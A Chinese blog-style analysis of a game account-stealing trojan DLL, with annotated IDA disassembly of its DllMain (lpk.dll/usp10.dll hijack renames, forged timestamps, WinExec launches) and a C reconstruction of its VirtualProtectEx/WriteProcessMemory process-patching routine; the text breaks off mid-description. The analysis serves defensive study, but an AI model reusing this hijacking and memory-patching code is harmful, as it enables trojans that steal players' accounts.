今天小红伞居然拦截了ie,看了看原因,呵呵,中马了,这年头。。。。。
没事权当玩玩,抓了木马样本(usp10.dll),pediy查壳,居然这么客气,没加壳,od载入,呵呵,弹出对话框找不到文件,什么原因呢,哦原来usp10.dll
改名为lpk.dll,无奈,无语,自己重命名了,呵呵,od再次载入,这次就没问题了。先描述下这个木马吧,大小156k,隐藏,注入iexplore.exe,sethcc.exe,
wow.exe(查了下,原来是魔兽世界网络进程,看来是魔兽热血传奇盗号木马)。ida打开木马样本,个人比较喜欢从整体去看一个东西,所以先把dllmain整个扫了一遍。
; --- DllMain (fragment: the prologue and the branch that reaches loc_10001D2A are
; not part of this excerpt) ---
; Reviewer summary of the visible part:
;   * copies 55 bytes from the system lpk.dll's LpkEditControl table (+4) into
;     unk_10020054 (see the author's memcpy note below)
;   * fills a fixed SYSTEMTIME of 2004-08-15 01:00:00 and converts it with
;     SystemTimeToFileTime - per the author this is the forged file timestamp
;   * GetModuleFileNameA(NULL) + _strlwr: lower-cased host process path
;   * GetTickCount & 1 selects which of "Lpk.dll" / "Usp10.dll" plays the old
;     and which the new name in the rename sequence below
;   * removes Thumbss.db / Thumbs.db in the working directory, then _rename()s
;   * CreateThread(StartAddress), handle closed immediately
;   * loc_10001D2A branch: host name containing "sethcc.exe" -> WinExec("sethcc.exe 211");
;     host path containing "mir" and ".dat" -> WinExec of iexplore.exe with an sdo.com URL
;   * returns TRUE (eax = 1), retn 0Ch (stdcall, the three DllMain arguments)
; Defender notes: renames between lpk.dll/usp10.dll next to an application,
; Thumbs.db deletion, and a thread created from DllMain are the observable
; indicators in this fragment.
push offset aLpkeditcontrol ; "LpkEditControl"
.text:10001BEA call GetProcessAddress ; author's note: resolves the export from the system-directory lpk.dll
.text:10001BEF add eax, 4 ; skip the first dword of the exported table
.text:10001BF2 push eax ; Src
.text:10001BF3 push offset unk_10020054 ; Dst
.text:10001BF8 call _memcpy ; memcpy(LpkEditControl+1, (int*)GetAddress("LpkEditControl") + 1,55);
.text:10001BF8 ;
.text:10001BFD add esp, 0Ch
.text:10001C00 mov SystemTime.wYear, 7D4h ; 2004-08-15 01:00:00 - a constant, not the current time
.text:10001C09 mov SystemTime.wMonth, 8
.text:10001C12 mov SystemTime.wDay, 0Fh
.text:10001C1B push offset FileTime ; lpFileTime
.text:10001C20 push offset SystemTime ; lpSystemTime
.text:10001C25 mov SystemTime.wHour, 1
.text:10001C2E mov SystemTime.wMinute, bx ; ebx is 0 here (it is also the Val=0 of the memsets below)
.text:10001C35 mov SystemTime.wSecond, bx
.text:10001C3C mov SystemTime.wDayOfWeek, bx
.text:10001C43 mov SystemTime.wMilliseconds, bx
.text:10001C4A call ds:SystemTimeToFileTime ; FileTime = 2004-08-15; author: used as the forged creation/modification time
.text:10001C50 mov edi, 104h ; MAX_PATH
.text:10001C55 mov esi, offset Filename
.text:10001C5A push edi ; Size
.text:10001C5B push ebx ; Val
.text:10001C5C push esi ; Dst
.text:10001C5D call _memset ; memset(filename,0,260)
.text:10001C62 push edi ; Size
.text:10001C63 mov ebp, offset OldFilename
.text:10001C68 push ebx ; Val
.text:10001C69 push ebp ; Dst
.text:10001C6A call _memset ; memset(oldfilename,0,260)
.text:10001C6F add esp, 18h
.text:10001C72 push edi ; nSize
.text:10001C73 push esi ; lpFilename
.text:10001C74 push ebx ; hModule
.text:10001C75 call ds:GetModuleFileNameA ; GetModuleFileName(NULL,Filename,260)
.text:10001C75 ; If hmodule is NULL, GetModuleFileName returns the path for the file used to create
the calling process.
.text:10001C75 ;
.text:10001C75 ;
.text:10001C75 ;
.text:10001C7B push esi ; String --- filename
.text:10001C7C call __strlwr ; lower-case the host path so the later strstr checks are case-insensitive
.text:10001C81 pop ecx
.text:10001C82 call ds:GetTickCount
.text:10001C88 test al, 1 ; low bit of the tick count picks the rename direction (author: renames the DLL at a chosen moment)
.text:10001C8A mov ebx, offset aLpk_dll ; "Lpk.dll"
.text:10001C8F jnz short loc_10001CA1
.text:10001C91 push ebx ; Source
.text:10001C92 push ebp ; Dest
.text:10001C93 call _strcpy ; strcpy(oldfilename,"lpk.dll")
.text:10001C98 pop ecx
.text:10001C99 mov edi, offset FileName ; "Usp10.dll"
.text:10001C9E pop ecx
.text:10001C9F jmp short loc_10001CAF
.text:10001CA1 ; ---------------------------------------------------------------------------
.text:10001CA1
.text:10001CA1 loc_10001CA1: ; CODE XREF: DllMain(x,x,x)+D8j
.text:10001CA1 mov edi, offset FileName ; "Usp10.dll"
.text:10001CA6 push edi ; Source
.text:10001CA7 push ebp ; Dest
.text:10001CA8 call _strcpy ; strcpy(oldfilename,"usp10.dll") - ebp still points at OldFilename
.text:10001CAD pop ecx
.text:10001CAE pop ecx
.text:10001CAF
.text:10001CAF loc_10001CAF: ; CODE XREF: DllMain(x,x,x)+E8j
.text:10001CAF mov esi, ds:GetFileAttributesA ; esi = GetFileAttributesA, used as an existence check below
.text:10001CB5 push edi ; lpFileName
.text:10001CB6 call esi ; GetFileAttributesA
.text:10001CB8 cmp eax, 0FFFFFFFFh ; 0xFFFFFFFF indicates failure
.text:10001CBB jnz short loc_10001CC1
.text:10001CBD push ebp ; NewFilename = OldFilename buffer
.text:10001CBE push ebx ; OldFilename = "Lpk.dll"
.text:10001CBF jmp short loc_10001D04 ; -> shared _rename call
.text:10001CC1 ; ---------------------------------------------------------------------------
.text:10001CC1
.text:10001CC1 loc_10001CC1: ; CODE XREF: DllMain(x,x,x)+104j
.text:10001CC1 push ebx ; lpFileName
.text:10001CC2 call esi ; GetFileAttributesA
.text:10001CC4 cmp eax, 0FFFFFFFFh
.text:10001CC7 jnz short loc_10001CCD
.text:10001CC9 push ebp ; NewFilename = OldFilename buffer
.text:10001CCA push edi ; OldFilename = "Usp10.dll"
.text:10001CCB jmp short loc_10001D04 ; -> shared _rename call
.text:10001CCD ; ---------------------------------------------------------------------------
.text:10001CCD
.text:10001CCD loc_10001CCD: ; CODE XREF: DllMain(x,x,x)+110j
.text:10001CCD mov edi, offset aThumbss_db ; "Thumbss.db"
.text:10001CD2 push edi ; Filename
.text:10001CD3 call _remove
.text:10001CD8 mov ebp, offset aThumbs_db ; "Thumbs.db"
.text:10001CDD push ebp ; Filename
.text:10001CDE call _remove ; remove("Thumbs.db"); both names are deleted from the current directory
.text:10001CE3 pop ecx
.text:10001CE4 pop ecx
.text:10001CE5 push edi ; lpFileName
.text:10001CE6 call esi ; GetFileAttributesA
.text:10001CE8 cmp eax, 0FFFFFFFFh
.text:10001CEB jnz short loc_10001CF6
.text:10001CED push edi ; NewFilename
.text:10001CEE push ebx ; OldFilename
.text:10001CEF call _rename ; rename("Lpk.dll", "Thumbss.db") if Thumbss.db does not exist
.text:10001CF4 pop ecx
.text:10001CF5 pop ecx
.text:10001CF6
.text:10001CF6 loc_10001CF6: ; CODE XREF: DllMain(x,x,x)+134j
.text:10001CF6 push ebp ; lpFileName
.text:10001CF7 call esi ; GetFileAttributesA
.text:10001CF9 cmp eax, 0FFFFFFFFh
.text:10001CFC jnz short loc_10001D0B
.text:10001CFE push ebp ; NewFilename = "Thumbs.db"
.text:10001CFF push offset FileName ; "Usp10.dll"
.text:10001D04
.text:10001D04 loc_10001D04: ; CODE XREF: DllMain(x,x,x)+108j
.text:10001D04 ; DllMain(x,x,x)+114j
.text:10001D04 call _rename ; shared rename(old, new); the arguments were pushed by whichever branch arrived here
.text:10001D09 pop ecx
.text:10001D0A pop ecx
.text:10001D0B
.text:10001D0B loc_10001D0B: ; CODE XREF: DllMain(x,x,x)+145j
.text:10001D0B xor eax, eax
.text:10001D0D push eax ; lpThreadId
.text:10001D0E push eax ; dwCreationFlags
.text:10001D0F push eax ; lpParameter
.text:10001D10 push offset StartAddress ; lpStartAddress
.text:10001D15 push eax ; dwStackSize
.text:10001D16 push eax ; lpThreadAttributes
.text:10001D17 call ds:CreateThread ; worker thread started from DllMain; its handle is discarded right away
.text:10001D1D push eax ; hObject
.text:10001D1E call ds:CloseHandle
.text:10001D24 pop ebp
.text:10001D25 jmp loc_10001DDE
.text:10001D2A ; ---------------------------------------------------------------------------
.text:10001D2A
.text:10001D2A loc_10001D2A: ; CODE XREF: DllMain(x,x,x)+11j
.text:10001D2A mov esi, offset Filename ; presumably the host process path; the branch from DllMain+11 that leads here is outside this excerpt
.text:10001D2F push offset aSethcc_exe ; "sethcc.exe"
.text:10001D34 push esi ; Str
.text:10001D35 call _strstr
.text:10001D3A mov edi, ds:WinExec
.text:10001D40 pop ecx
.text:10001D41 test eax, eax
.text:10001D43 pop ecx
.text:10001D44 jz short loc_10001D58
.text:10001D46 cmp dword_10028448, 0Bh ; global flag compared with 0Bh; its meaning is not visible in this excerpt
.text:10001D4D jz short loc_10001D58
.text:10001D4F push 1 ; uCmdShow The directory from which the application loaded
.text:10001D51 push offset CmdLine ; "sethcc.exe 211"
.text:10001D56 call edi ; WinExec ; launches "sethcc.exe 211" (author: runs the given program)
.text:10001D58
.text:10001D58 loc_10001D58: ; CODE XREF: DllMain(x,x,x)+18Dj
.text:10001D58 ; DllMain(x,x,x)+196j
.text:10001D58 push offset aMir ; "mir"
.text:10001D5D push esi ; Str
.text:10001D5E call _strstr
.text:10001D63 pop ecx
.text:10001D64 test eax, eax
.text:10001D66 pop ecx
.text:10001D67 jz short loc_10001DC0
.text:10001D69 push offset a_dat ; ".dat"
.text:10001D6E push esi ; Str
.text:10001D6F call _strstr
.text:10001D74 pop ecx
.text:10001D75 test eax, eax
.text:10001D77 pop ecx
.text:10001D78 jz short loc_10001DC0 ; both "mir" and ".dat" must appear in the host path
.text:10001D7A mov esi, offset byte_10026A54 ; string substituted for %s below; where it is filled is not visible here
.text:10001D7F push esi ; Str
.text:10001D80 call _strlen
.text:10001D85 cmp eax, 3
.text:10001D88 pop ecx
.text:10001D89 jbe short loc_10001DC0 ; requires strlen > 3
.text:10001D8B cmp dword_1002845C, 63h ; another global flag, compared with 63h
.text:10001D92 jnz short loc_10001DC0
.text:10001D94 push 0C00h ; Size
.text:10001D99 lea eax, [esp+0C10h+Dst] ; Dst = 0C00h-byte stack buffer (matches add esp, 0C00h in the epilogue)
.text:10001D9D push ebx ; Val
.text:10001D9E push eax ; Dst
.text:10001D9F call _memset
.text:10001DA4 push esi
.text:10001DA5 lea eax, [esp+0C1Ch+Dst]
.text:10001DA9 push offset aSIexplore_exeH ; "\"%s\\iexplore.exe\" http://ekey.sdo.com/e"...
.text:10001DAE push eax ; Dest
.text:10001DAF call _sprintf ; unbounded sprintf into the stack buffer
.text:10001DB4 add esp, 18h
.text:10001DB7 lea eax, [esp+0C0Ch+Dst]
.text:10001DBB push 1 ; uCmdShow
.text:10001DBD push eax ; lpCmdLine
.text:10001DBE call edi ; WinExec ; author: opens the Shanda (sdo.com) e-key page in IE
.text:10001DC0
.text:10001DC0 loc_10001DC0: ; CODE XREF: DllMain(x,x,x)+1B0j
.text:10001DC0 ; DllMain(x,x,x)+1C1j ...
.text:10001DC0 mov eax, hLibModule
.text:10001DC5 mov esi, ds:FreeLibrary
.text:10001DCB cmp eax, ebx
.text:10001DCD jz short loc_10001DD2
.text:10001DCF push eax ; hLibModule
.text:10001DD0 call esi ; FreeLibrary ; release hLibModule when it differs from ebx
.text:10001DD2
.text:10001DD2 loc_10001DD2: ; CODE XREF: DllMain(x,x,x)+216j
.text:10001DD2 mov eax, dword_10028430
.text:10001DD7 cmp eax, ebx
.text:10001DD9 jz short loc_10001DDE
.text:10001DDB push eax ; hLibModule
.text:10001DDC call esi ; FreeLibrary
.text:10001DDE
.text:10001DDE loc_10001DDE: ; CODE XREF: DllMain(x,x,x)+18j
.text:10001DDE ; DllMain(x,x,x)+16Ej ...
.text:10001DDE push 1
.text:10001DE0 pop eax ; return TRUE
.text:10001DE1 pop edi
.text:10001DE2 pop esi
.text:10001DE3 pop ebx
.text:10001DE4 add esp, 0C00h ; free the 0C00h-byte local buffer
.text:10001DEA retn 0Ch ; stdcall: DllMain(hinstDLL, fdwReason, lpvReserved)
百度"LpkEditControl"字符串,居然发现了一个信息,呵呵,原来该病毒是看雪上一个老兄写的。。。。。。。LpkEditControl是一个数组,里面存放了一
些函数,呵呵,我想这个老兄当初写这个病毒的时候一定在看《加密与解密第三版》,下面的这段反汇编代码我相信大家一定会很熟悉的。。。。。
; --- PatchProcess(HANDLE hProcess) --- (proc header not shown; closes at PatchProcess endp)
; Frame: push ebp / mov ebp, esp / sub esp, 7Ch. The locals are the byte patches,
; built one byte at a time with mov [ebp+var_xx], imm; hProcess is read from
; [ebp+hProcess]. ebx is zeroed at 10001E17 and reused as the 0x00 fill byte
; and as the NULL lpNumberOfBytesWritten.
; Every patch follows the same pair: VirtualProtectEx(hProcess, addr, size, 40h =
; PAGE_EXECUTE_READWRITE, &flOldProtect) then WriteProcessMemory(hProcess, addr,
; buf, size, NULL). No return value is checked and the old protection is never restored.
; Hard-coded targets (from the pushes below): 401496h (2 bytes), 40163Ch (5),
; 401655h (2), 40FAA8h (10h), 41AE68h (5Ah). Fixed image addresses like these only
; fit the one client build they were taken from.
; Defender note: VirtualProtectEx + WriteProcessMemory into a foreign process from
; a DLL loaded out of the application directory is the behaviour to alert on.
.text:10001DED push ebp ; author's note: this is the patch code built into the crafted lpk.dll
.text:10001DEE mov ebp, esp
.text:10001DF0 sub esp, 7Ch ; 124 bytes of locals: the five patch buffers plus flOldProtect
.text:10001DF3 push ebx
.text:10001DF4 push esi
.text:10001DF5 lea eax, [ebp+flOldProtect]
.text:10001DF8 mov esi, ds:VirtualProtectEx ; esi = VirtualProtectEx for the whole routine
.text:10001DFE push edi
.text:10001DFF push eax ; lpflOldProtect
.text:10001E00 push 40h ; flNewProtect = PAGE_EXECUTE_READWRITE
.text:10001E02 mov edi, 401496h ; first target address, reused for the write below
.text:10001E07 push 2 ; dwSize
.text:10001E09 push edi ; lpAddress
.text:10001E0A push [ebp+hProcess] ; hProcess
.text:10001E0D mov [ebp+Buffer], 0EBh ; unsigned char p401496[2] = {0xEB, 0x29};
.text:10001E11 mov [ebp+var_1], 29h
.text:10001E15 call esi ; VirtualProtectEx ; make the page writable: VirtualProtectEx(hProcess, (LPVOID)0x401496, 2,
PAGE_EXECUTE_READWRITE, &Oldpp);
.text:10001E17 xor ebx, ebx ; ebx = 0 from here on
.text:10001E19 lea eax, [ebp+Buffer]
.text:10001E1C push ebx ; lpNumberOfBytesWritten
.text:10001E1D push 2 ; nSize
.text:10001E1F push eax ; lpBuffer
.text:10001E20 push edi ; lpBaseAddress
.text:10001E21 push [ebp+hProcess] ; hProcess
.text:10001E24 mov edi, ds:WriteProcessMemory ; edi = WriteProcessMemory for the rest of the routine
.text:10001E2A call edi ; WriteProcessMemory ; write the bytes into the target: WriteProcessMemory(hProcess, (LPVOID)0x401496, p401496, 2,
NULL);
.text:10001E2C lea eax, [ebp+flOldProtect]
.text:10001E2F mov [ebp+var_10], 0E8h
.text:10001E33 push eax ; lpflOldProtect
.text:10001E34 push 40h ; flNewProtect
.text:10001E36 push 5 ; dwSize
.text:10001E38 push 40163h ; lpAddress - NOTE: 40163h here, but the matching write below targets 40163Ch; looks like a dropped trailing nibble in the binary, so this protect call does not cover the written range
.text:10001E3D push [ebp+hProcess] ; hProcess
.text:10001E40 mov [ebp+var_F], 67h
.text:10001E44 mov [ebp+var_E], 0E4h
.text:10001E48 mov [ebp+var_D], bl
.text:10001E4B mov [ebp+var_C], bl ; unsigned char p40163C[5] = {0xE8, 0x67, 0xE4, 0x00, 0x00};
.text:10001E4E call esi ; VirtualProtectEx ; VirtualProtectEx(hProcess, (LPVOID)0x40163, 5, PAGE_EXECUTE_READWRITE,
&Oldpp);
.text:10001E4E ;
.text:10001E50 push ebx ; lpNumberOfBytesWritten
.text:10001E51 lea eax, [ebp+var_10]
.text:10001E54 push 5 ; nSize
.text:10001E56 push eax ; lpBuffer
.text:10001E57 push 40163Ch ; lpBaseAddress
.text:10001E5C push [ebp+hProcess] ; hProcess
.text:10001E5F call edi ; WriteProcessMemory ; WriteProcessMemory(hProcess, (LPVOID)0x40163C, p40163C, 5, NULL);
.text:10001E61 lea eax, [ebp+flOldProtect]
.text:10001E64 mov [ebp+var_4], 0EBh ; unsigned char p401655[2] = {0xEB, 0x67};
.text:10001E68 push eax ; lpflOldProtect
.text:10001E69 push 40h ; flNewProtect
.text:10001E6B push 2 ; dwSize
.text:10001E6D push 401655h ; lpAddress
.text:10001E72 push [ebp+hProcess] ; hProcess
.text:10001E75 mov [ebp+var_3], 67h
.text:10001E79 call esi ; VirtualProtectEx ; VirtualProtectEx(hProcess, (LPVOID)0x401655, 2, PAGE_EXECUTE_READWRITE,
&Oldpp);
.text:10001E7B push ebx ; lpNumberOfBytesWritten
.text:10001E7C lea eax, [ebp+var_4]
.text:10001E7F push 2 ; nSize
.text:10001E81 push eax ; lpBuffer
.text:10001E82 push 401655h ; lpBaseAddress
.text:10001E87 push [ebp+hProcess] ; hProcess
.text:10001E8A call edi ; WriteProcessMemory ; WriteProcessMemory(hProcess, (LPVOID)0x401655, p401655, 2, NULL);
.text:10001E8C lea eax, [ebp+flOldProtect]
.text:10001E8F or [ebp+var_1B], 0FFh ; the 0xFF bytes of p40FAA8 are set with or, the rest with mov
.text:10001E93 or [ebp+var_1A], 0FFh
.text:10001E97 push eax ; lpflOldProtect
.text:10001E98 push 40h ; flNewProtect
.text:10001E9A push 10h ; dwSize
.text:10001E9C push 40FAA8h ; lpAddress
.text:10001EA1 mov [ebp+var_20], 50h ; var_20..var_11: the 16-byte p40FAA8 buffer, interleaved with the argument pushes
.text:10001EA5 push [ebp+hProcess] ; hProcess
.text:10001EA8 mov [ebp+var_1F], 8Ah
.text:10001EAC mov [ebp+var_1E], 85h
.text:10001EB0 mov [ebp+var_1D], 0ACh
.text:10001EB4 mov [ebp+var_1C], 0FDh
.text:10001EB8 mov [ebp+var_19], 0A2h
.text:10001EBC mov [ebp+var_18], 76h
.text:10001EC0 mov [ebp+var_17], 0AEh
.text:10001EC4 mov [ebp+var_16], 41h
.text:10001EC8 mov [ebp+var_15], bl
.text:10001ECB mov [ebp+var_14], 58h
.text:10001ECF mov [ebp+var_13], 0C2h
.text:10001ED3 mov [ebp+var_12], 10h
.text:10001ED7 mov [ebp+var_11], bl
.text:10001EDA call esi ; VirtualProtectEx
.text:10001EDC push ebx ; lpNumberOfBytesWritten
.text:10001EDD lea eax, [ebp+var_20]
.text:10001EE0 push 10h ; nSize
.text:10001EE2 push eax ; lpBuffer
.text:10001EE3 push 40FAA8h ; lpBaseAddress
.text:10001EE8 push [ebp+hProcess] ; hProcess
.text:10001EEB call edi ; WriteProcessMemory ; unsigned char p40FAA8[16] = {0x50, 0x8A, 0x85, 0xAC, 0xFD, 0xFF, 0xFF,
0xA2, 0x76, 0xAE, 0x41, 0x00, 0x58, 0xC2, 0x10, 0x00};
.text:10001EEB ; VirtualProtectEx(hProcess, (LPVOID)0x40FAA8, 16, PAGE_EXECUTE_READWRITE, &Oldpp);
.text:10001EEB ; WriteProcessMemory(hProcess, (LPVOID)0x40FAA8, p40FAA8, 16, NULL);
.text:10001EED or [ebp+var_3B], 0FFh ; var_7C..var_23: the 90-byte (5Ah) p41AE68 buffer
.text:10001EF1 mov [ebp+var_7C], 14h
.text:10001EF5 mov [ebp+var_7B], 15h
.text:10001EF9 mov [ebp+var_7A], bl
.text:10001EFC mov [ebp+var_79], bl
.text:10001EFF mov [ebp+var_78], 0D5h
.text:10001F03 mov [ebp+var_77], 7
.text:10001F07 mov [ebp+var_76], 9
.text:10001F0B mov [ebp+var_75], bl
.text:10001F0E mov [ebp+var_74], 1
.text:10001F12 mov [ebp+var_73], bl
.text:10001F15 mov [ebp+var_72], 13h
.text:10001F19 mov [ebp+var_71], bl
.text:10001F1C mov [ebp+var_70], 3
.text:10001F20 mov [ebp+var_6F], bl
.text:10001F23 mov [ebp+var_6E], 6Dh
.text:10001F27 mov [ebp+var_6D], bl
.text:10001F2A mov [ebp+var_6C], 11h
.text:10001F2E mov [ebp+var_6B], bl
.text:10001F31 mov [ebp+var_6A], 0BBh
.text:10001F35 mov [ebp+var_69], bl
.text:10001F38 mov [ebp+var_68], 91h
.text:10001F3C mov [ebp+var_67], 53h
.text:10001F40 mov [ebp+var_66], 1
.text:10001F44 mov [ebp+var_65], bl
.text:10001F47 mov [ebp+var_64], 21h
.text:10001F4B mov [ebp+var_63], 61h
.text:10001F4F mov [ebp+var_62], bl
.text:10001F52 mov [ebp+var_61], bl
.text:10001F55 mov [ebp+var_60], 1Eh
.text:10001F59 mov [ebp+var_5F], bl
.text:10001F5C mov [ebp+var_5E], 0C5h
.text:10001F60 mov [ebp+var_5D], 0Bh
.text:10001F64 mov [ebp+var_5C], 0C9h
.text:10001F68 mov [ebp+var_5B], 0Bh
.text:10001F6C mov [ebp+var_5A], 30h
.text:10001F70 mov [ebp+var_59], 0BDh
.text:10001F74 mov [ebp+var_58], 97h
.text:10001F78 mov [ebp+var_57], 88h
.text:10001F7C mov [ebp+var_56], 8Eh
.text:10001F80 mov [ebp+var_55], bl
.text:10001F83 mov [ebp+var_54], 0BEh
.text:10001F87 mov [ebp+var_53], 19h
.text:10001F8B mov [ebp+var_52], bl
.text:10001F8E mov [ebp+var_51], bl
.text:10001F91 mov [ebp+var_50], 0D4h
.text:10001F95 mov [ebp+var_4F], 12h
.text:10001F99 mov [ebp+var_4E], bl
.text:10001F9C mov [ebp+var_4D], bl ; unsigned char p41AE68[90] =
.text:10001F9C ; {
.text:10001F9C ; 0x14, 0x15, 0x00, 0x00, 0xD5, 0x07, 0x09, 0x00, 0x01, 0x00, 0x13,
0x00, 0x03, 0x00, 0x6D, 0x00,
.text:10001F9C ; 0x11, 0x00, 0xBB, 0x00, 0x91, 0x53, 0x01, 0x00, 0x21, 0x61, 0x00,
0x00, 0x1E, 0x00, 0xC5, 0x0B,
.text:10001F9C ; 0xC9, 0x0B, 0x30, 0xBD, 0x97, 0x88, 0x8E, 0x00, 0xBE, 0x19, 0x00,
0x00, 0xD4, 0x12, 0x00, 0x00,
.text:10001F9C ; 0x6F, 0x35, 0xE1, 0x52, 0x51, 0xA4, 0xB7, 0x07, 0x76, 0xE7, 0xD4,
0xA1, 0x43, 0x98, 0x88, 0xD6,
.text:10001F9C ; 0x45, 0xFF, 0xC6, 0xB1, 0x43, 0x66, 0x77, 0x98, 0x77, 0x67, 0x54,
0x66, 0x77, 0x53, 0x64, 0x58,
.text:10001F9C ; 0x6C, 0x66, 0x05, 0x08, 0x60, 0x16, 0x30, 0xB4, 0xAA, 0x54
.text:10001F9C ; } ;
.text:10001F9C ; VirtualProtectEx(hProcess, (LPVOID)0x41AE68, 90, PAGE_EXECUTE_READWRITE,
&Oldpp);
.text:10001F9C ; WriteProcessMemory(hProcess, (LPVOID)0x41AE68, p41AE68, 90, NULL);
.text:10001F9C ; }
.text:10001F9F mov [ebp+var_4C], 6Fh
.text:10001FA3 mov [ebp+var_4B], 35h
.text:10001FA7 mov [ebp+var_4A], 0E1h
.text:10001FAB mov [ebp+var_49], 52h
.text:10001FAF mov [ebp+var_48], 51h
.text:10001FB3 mov [ebp+var_47], 0A4h
.text:10001FB7 mov [ebp+var_46], 0B7h
.text:10001FBB mov [ebp+var_45], 7
.text:10001FBF mov [ebp+var_44], 76h
.text:10001FC3 mov [ebp+var_43], 0E7h
.text:10001FC7 mov [ebp+var_42], 0D4h
.text:10001FCB mov [ebp+var_41], 0A1h
.text:10001FCF mov [ebp+var_40], 43h
.text:10001FD3 mov [ebp+var_3F], 98h
.text:10001FD7 mov [ebp+var_3E], 88h
.text:10001FDB mov [ebp+var_3D], 0D6h
.text:10001FDF mov [ebp+var_3C], 45h
.text:10001FE3 mov [ebp+var_3A], 0C6h ; var_3B (0xFF) was already set by the or above
.text:10001FE7 mov [ebp+var_39], 0B1h
.text:10001FEB mov [ebp+var_38], 43h
.text:10001FEF mov [ebp+var_37], 66h
.text:10001FF3 mov [ebp+var_36], 77h
.text:10001FF7 mov [ebp+var_35], 98h
.text:10001FFB mov [ebp+var_34], 77h
.text:10001FFF mov [ebp+var_33], 67h
.text:10002003 lea eax, [ebp+flOldProtect]
.text:10002006 mov [ebp+var_32], 54h
.text:1000200A push eax ; lpflOldProtect
.text:1000200B push 40h ; flNewProtect
.text:1000200D push 5Ah ; dwSize = 90
.text:1000200F push 41AE68h ; lpAddress
.text:10002014 push [ebp+hProcess] ; hProcess
.text:10002017 mov [ebp+var_31], 66h ; the remaining bytes are stored after the arguments are pushed, before the call
.text:1000201B mov [ebp+var_30], 77h
.text:1000201F mov [ebp+var_2F], 53h
.text:10002023 mov [ebp+var_2E], 64h
.text:10002027 mov [ebp+var_2D], 58h
.text:1000202B mov [ebp+var_2C], 6Ch
.text:1000202F mov [ebp+var_2B], 66h
.text:10002033 mov [ebp+var_2A], 5
.text:10002037 mov [ebp+var_29], 8
.text:1000203B mov [ebp+var_28], 60h
.text:1000203F mov [ebp+var_27], 16h
.text:10002043 mov [ebp+var_26], 30h
.text:10002047 mov [ebp+var_25], 0B4h
.text:1000204B mov [ebp+var_24], 0AAh
.text:1000204F mov [ebp+var_23], 54h
.text:10002053 call esi ; VirtualProtectEx
.text:10002055 push ebx ; lpNumberOfBytesWritten
.text:10002056 lea eax, [ebp+var_7C]
.text:10002059 push 5Ah ; nSize
.text:1000205B push eax ; lpBuffer
.text:1000205C push 41AE68h ; lpBaseAddress
.text:10002061 push [ebp+hProcess] ; hProcess
.text:10002064 call edi ; WriteProcessMemory ; last patch; its result is not checked either
.text:10002066 pop edi
.text:10002067 pop esi
.text:10002068 pop ebx
.text:10002069 leave
.text:1000206A retn ; cdecl: the caller removes hProcess
.text:1000206A PatchProcess endp
上面的代码主要采用了dll劫持技术,该木马利用当前程序会首先加载所在目录dll的特点而在当前目录下创建lpk.dll并构造了十几个输出函数(太多了,不列出来了),其实作者什么东西都没有改,代码是《加密与解密》里面的。。。。。。下面是c语言代码。。。。。
/*
 * PatchProcess - the author's C reconstruction of the PatchProcess routine
 * disassembled above.
 *
 * hProcess: handle to the target process (opened elsewhere; not shown on this page).
 *
 * Each step is the same VirtualProtectEx + WriteProcessMemory pair on a fixed
 * image address; no return value is checked and the previous protection kept in
 * Oldpp is never restored. The addresses, sizes and byte values match the pushes
 * and mov [ebp+var_xx] stores in the disassembly.
 *
 * Defender note: this cross-process write pattern from a DLL sitting in the
 * application directory is the behaviour to detect; the fixed addresses tie the
 * sample to one specific client build.
 */
void PatchProcess(HANDLE hProcess)
{
DWORD Oldpp; /* receives the previous page protection; never restored */
unsigned char p401496[2] = {
0xEB, 0x29
};
VirtualProtectEx(hProcess, (LPVOID)0x401496, 2, PAGE_EXECUTE_READWRITE, &Oldpp);
WriteProcessMemory(hProcess, (LPVOID)0x401496, p401496, 2, NULL);
unsigned char p40163C[5] = {
0xE8, 0x67, 0xE4, 0x00, 0x00
};
/* 0x40163 here versus 0x40163C in the write below: this matches the disassembly
 * (push 40163h at 10001E38), so it is the binary's own mismatch, not a
 * transcription error in the reconstruction. */
VirtualProtectEx(hProcess, (LPVOID)0x40163, 5, PAGE_EXECUTE_READWRITE, &Oldpp);
WriteProcessMemory(hProcess, (LPVOID)0x40163C, p40163C, 5, NULL);
unsigned char p401655[2] = {
0xEB, 0x67
};
VirtualProtectEx(hProcess, (LPVOID)0x401655, 2, PAGE_EXECUTE_READWRITE, &Oldpp);
WriteProcessMemory(hProcess, (LPVOID)0x401655, p401655, 2, NULL);
unsigned char p40FAA8[16] = {
0x50, 0x8A, 0x85, 0xAC, 0xFD, 0xFF, 0xFF, 0xA2, 0x76, 0xAE, 0x41, 0x00, 0x58, 0xC2, 0x10, 0x00
};
VirtualProtectEx(hProcess, (LPVOID)0x40FAA8, 16, PAGE_EXECUTE_READWRITE, &Oldpp);
WriteProcessMemory(hProcess, (LPVOID)0x40FAA8, p40FAA8, 16, NULL);
/* 90 bytes: var_7C..var_23 in the disassembly (dwSize/nSize 5Ah) */
unsigned char p41AE68[90] =
{
0x14, 0x15, 0x00, 0x00, 0xD5, 0x07, 0x09, 0x00, 0x01, 0x00, 0x13, 0x00, 0x03, 0x00, 0x6D, 0x00,
0x11, 0x00, 0xBB, 0x00, 0x91, 0x53, 0x01, 0x00, 0x21, 0x61, 0x00, 0x00, 0x1E, 0x00, 0xC5, 0x0B,
0xC9, 0x0B, 0x30, 0xBD, 0x97, 0x88, 0x8E, 0x00, 0xBE, 0x19, 0x00, 0x00, 0xD4, 0x12, 0x00, 0x00,
0x6F, 0x35, 0xE1, 0x52, 0x51, 0xA4, 0xB7, 0x07, 0x76, 0xE7, 0xD4, 0xA1, 0x43, 0x98, 0x88, 0xD6,
0x45, 0xFF, 0xC6, 0xB1, 0x43, 0x66, 0x77, 0x98, 0x77, 0x67, 0x54, 0x66, 0x77, 0x53, 0x64, 0x58,
0x6C, 0x66, 0x05, 0x08, 0x60, 0x16, 0x30, 0xB4, 0xAA, 0x54
} ;
VirtualProtectEx(hProcess, (LPVOID)0x41AE68, 90, PAGE_EXECUTE_READWRITE, &Oldpp);
WriteProcessMemory(hProcess, (LPVOID)0x41AE68, p41AE68, 90, NULL);
}
获得魔兽的相关信息主要是开启一个线程,读取魔兽安装目录下config.wtf视频配置文件:
; --- StartthreadAddress --- thread entry (DATA XREF from sub_10007CEE+D2)
; Locals: DstBuf, a 0C00h-byte stack buffer (sub esp, 0C00h).
; Flow: fopen("WTF\\Config.wtf", "rb") - a relative path, so it resolves against
; the host process's current directory - read it into DstBuf via ReadFilefun,
; fclose, then require "warcraftchina.com" in the data. Next find "realmName",
; copy up to 8Ch bytes from 0Bh past the match into the global realmNamewh,
; require a '"' (22h) in that copy and terminate the string there. sub_1001A590
